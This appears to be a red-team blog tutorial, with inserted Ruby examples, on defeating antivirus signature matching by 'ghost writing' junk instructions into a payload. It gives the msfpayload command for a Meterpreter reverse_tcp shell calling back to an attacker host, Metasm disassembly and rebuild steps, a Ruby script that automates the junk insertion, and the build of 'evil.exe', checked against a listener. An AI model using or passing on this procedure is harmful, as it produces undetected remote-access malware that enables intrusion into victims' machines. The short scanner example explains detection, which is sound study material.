The challenge of evading antivirus has always been a discussion between malware developers, antivirus vendors and many other IT security professionals. The same challenge was faced by my team (I was in the Red Team) during a penetration test. We used ghost writing for antivirus evasion and were quite successful in pwning a fully patched and updated machine (Windows 8, Security Essentials) with a reverse shell.
How do Antivirus Engines Detect your Malicious Code ?
AV engines rely on two broad techniques for malware detection:
static analysis of the binary (signature matching) and heuristic or behavioural analysis of what the code does when it runs.
Static signature matching is the workhorse of most engines because it is cheap; behavioural analysis has a performance overhead at scan time and is applied more selectively. In static analysis the engine scans the file for known byte patterns called signatures. A signature is a short sequence of bytes, sometimes with wildcards, lifted from a known sample (for example the code that opens a socket for the reverse connection, or the code that creates a persistence registry entry). The point that matters for evasion is that a signature is matched against the bytes of the file, not against what the code means.
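As an added example (not from the original post and not taken from any AV product), the following Ruby snippet implements a toy byte-pattern scanner of the kind described above, with ?? as a one-byte wildcard, and shows that inserting a single junk byte inside the matched span defeats the signature while inserting it outside the span does not. The sample bytes and the signature are constructed for this example.

```ruby
# Added example: a toy static byte-signature scanner. A signature is a list of
# byte values where nil is a one-byte wildcard (the "??" of a hex-string rule).
def parse_signature(hex)
  hex.split.map { |tok| tok == "??" ? nil : tok.to_i(16) }
end

# Return the offset of the first match of sig inside data, or nil if none.
def scan(data, sig)
  bytes = data.bytes
  return nil if sig.length > bytes.length
  (0..bytes.length - sig.length).each do |off|
    hit = sig.each_with_index.all? { |b, i| b.nil? || bytes[off + i] == b }
    return off if hit
  end
  nil
end

# Insert junk bytes at a given offset: the byte-level view of ghost writing.
def insert_at(data, offset, junk)
  data.byteslice(0, offset) + junk + data.byteslice(offset..-1)
end

# Constructed x86 bytes: xor eax,eax ; push eax ; push 0x41 ; mov ebx,esp ; ret
SAMPLE = "\x31\xC0\x50\x6A\x41\x89\xE3\xC3".b

# Constructed signature: "xor eax,eax ; push eax ; push ??" (immediate wildcarded)
SIG = parse_signature("31 C0 50 6A ??")

# Run the three cases the text describes and return the match offsets.
def demo
  nop = "\x90".b
  {
    clean:        scan(SAMPLE, SIG),                      # signature found at 0
    junk_inside:  scan(insert_at(SAMPLE, 2, nop), SIG),   # nop between xor and push: no match
    junk_outside: scan(insert_at(SAMPLE, 5, nop), SIG),   # nop after the signature span: still found
  }
end
```

The wildcard makes the rule tolerant of a changed immediate, but not of a changed instruction sequence; that is the gap ghost writing exploits, and also why the junk has to land inside the bytes the signature covers.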
What is Ghost Writing ?
Ghost writing is a way of obfuscating the binary/assembly code so that the signature no longer exists in the file, while no functionality of the malware is lost.
The idea is to add semantically neutral assembly instructions to the disassembly of the executable, which changes the bytes the signature was written for, while maintaining the functionality of the malware at the same time.
First, create the malicious payload in raw binary format using the Metasploit Framework:
msfpayload windows/meterpreter/reverse_tcp LHOST=<your-ip> LPORT=<your-port> R> raw_binary
(On current Metasploit releases msfpayload has been replaced by msfvenom, whose raw output format serves the same purpose.)
Now we need to disassemble this raw binary with Metasm. Metasm is a Ruby library that can assemble, disassemble and build executables; here we use the sample scripts that ship with it.
On Kali, install the Metasm library with:
gem install metasm
Creating the disassembly of the binary code (the samples directory depends on where Metasm is installed; gem contents metasm lists it for a gem install):
ruby /usr/share/metasploit-framework/lib/metasm/samples/disassemble.rb raw_binary > asm_code.asm
Now the assembly code is ready. To obfuscate the code by hand one needs a working knowledge of x86 assembly. Please refer to this link for a tutorial on assembly.
The obfuscation is most effective when applied to the code regions that are actually flagging your target AV; bytes changed outside the signature do not help.
Add assembly instructions that leave the program state unchanged (for example pushing a register and popping it back, moving a register to itself, or incrementing and then decrementing the same register) before or between the original instructions, until the signature no longer matches, taking care that the functionality of the payload is not affected. Be aware that increments and decrements change the CPU flags, so they must not be placed directly before an instruction that reads the flags, such as a conditional jump.
A trick that usually does the job is to add the junk instructions directly before an XOR instruction that zeroes a register (xor eax, eax): because the XOR overwrites both the register and the flags, any junk that only touches that register or the flags is harmless there.
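As an added example, not from the original post and not part of Metasm, here is a small Ruby pass that performs the insertion step automatically on a disassembly listing: it places register-neutral junk before any instruction, and flag-clobbering inc/dec pairs only in front of instructions that overwrite the flags themselves, such as xor eax, eax. The listing SAMPLE_ASM is a constructed, simplified imitation of disassemble.rb output, not a real stager, and the resulting text still has to be assembled with peencode.rb.

```ruby
# Added example: automated ghost writing over an assembly listing (text only,
# no assembling). The junk sequences and the sample listing are constructed.

# Junk that changes no register, flag or memory the payload cares about.
NEUTRAL_JUNK = [
  ["push eax", "pop eax"],
  ["xchg eax, eax"],
  ["lea ebx, [ebx]"],
  ["mov ecx, ecx"],
]

# Junk that clobbers EFLAGS (inc/dec) but leaves registers unchanged. Safe only
# before an instruction that overwrites the flags itself, e.g. "xor eax, eax".
FLAG_JUNK = [
  ["inc edx", "dec edx"],
  ["dec esi", "inc esi"],
]

# Instructions that always rewrite the arithmetic flags, so stale flags from
# junk placed just before them can never be observed.
FLAG_WRITERS = /\A(xor|sub|and|or|cmp|test|add)\b/

# The code part of a listing line, with the trailing ";" comment removed.
def code_of(line)
  line.split(";").first.to_s.strip
end

# True for instruction lines; false for blanks, comments, labels and directives.
def instruction?(line)
  c = code_of(line)
  !c.empty? && !c.end_with?(":") && !c.start_with?(".")
end

# Returns [new_listing, inserted_line_count]. `rate` is the probability of
# inserting junk before a given instruction; `seed` makes the run reproducible.
def ghostwrite(listing, rate: 0.5, seed: 1)
  rng = Random.new(seed)
  out = []
  inserted = 0
  listing.each_line do |raw|
    line = raw.chomp
    if instruction?(line) && rng.rand < rate
      pool = NEUTRAL_JUNK.dup
      pool += FLAG_JUNK if code_of(line) =~ FLAG_WRITERS   # flags get overwritten anyway
      junk = pool[rng.rand(pool.length)]
      indent = line[/\A\s*/]
      junk.each { |j| out << "#{indent}#{j}" }
      inserted += junk.length
    end
    out << line
  end
  [out.join("\n") + "\n", inserted]
end

# The instruction stream of a listing (comments stripped), for comparison.
def instructions(listing)
  listing.each_line.map(&:chomp).select { |l| instruction?(l) }.map { |l| code_of(l) }
end

# Constructed, simplified listing in the style of disassemble.rb output.
SAMPLE_ASM = <<~ASM
  ; ---- constructed sample, not a real stager ----
  entrypoint:
      cld                        ; @0  fc
      call loc_1                 ; @1  e8 xx xx xx xx
      xor eax, eax               ; @6  31c0
  loc_1:
      pop ebx                    ; @8  5b
      jz loc_2                   ; @9  74 xx
      mov edx, esp               ; @b  89e2
  loc_2:
      ret                        ; @d  c3
ASM

if __FILE__ == $0
  text, count = ghostwrite(SAMPLE_ASM, rate: 1.0, seed: 7)
  puts text
  warn "inserted #{count} junk instruction(s)"
end
```

Because the listing is reassembled from labels rather than fixed offsets, the call/jump targets stay correct after the insertions; what the pass must never do is put flag-changing junk in front of the jz, which the FLAG_WRITERS check enforces.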
Building the executable from the assembly: peencode.rb
Add the following two lines to the top of the asm file:
.section '.text' rwx
.entrypoint
A quick explanation of the two lines: the .text section is where the actual code resides, and the first line declares it with read, write and execute permissions. The entrypoint is where execution begins; the second line explicitly marks the code that follows as the entrypoint.
Now build the executable, turning the assembly into a proper Windows PE file (adjust the path to your Metasm samples directory, as for disassemble.rb above):
ruby ~/tools/metasploit/lib/metasm/samples/peencode.rb asm_code.asm -o evil.exe
If all went right, checking the result with the file command will report it as an executable:
evil.exe: MS-DOS executable, MZ for MS-DOS
Before deploying it, run the new evil.exe against a listener to confirm that the shell still comes back; a junk instruction in the wrong place breaks the payload silently rather than the build.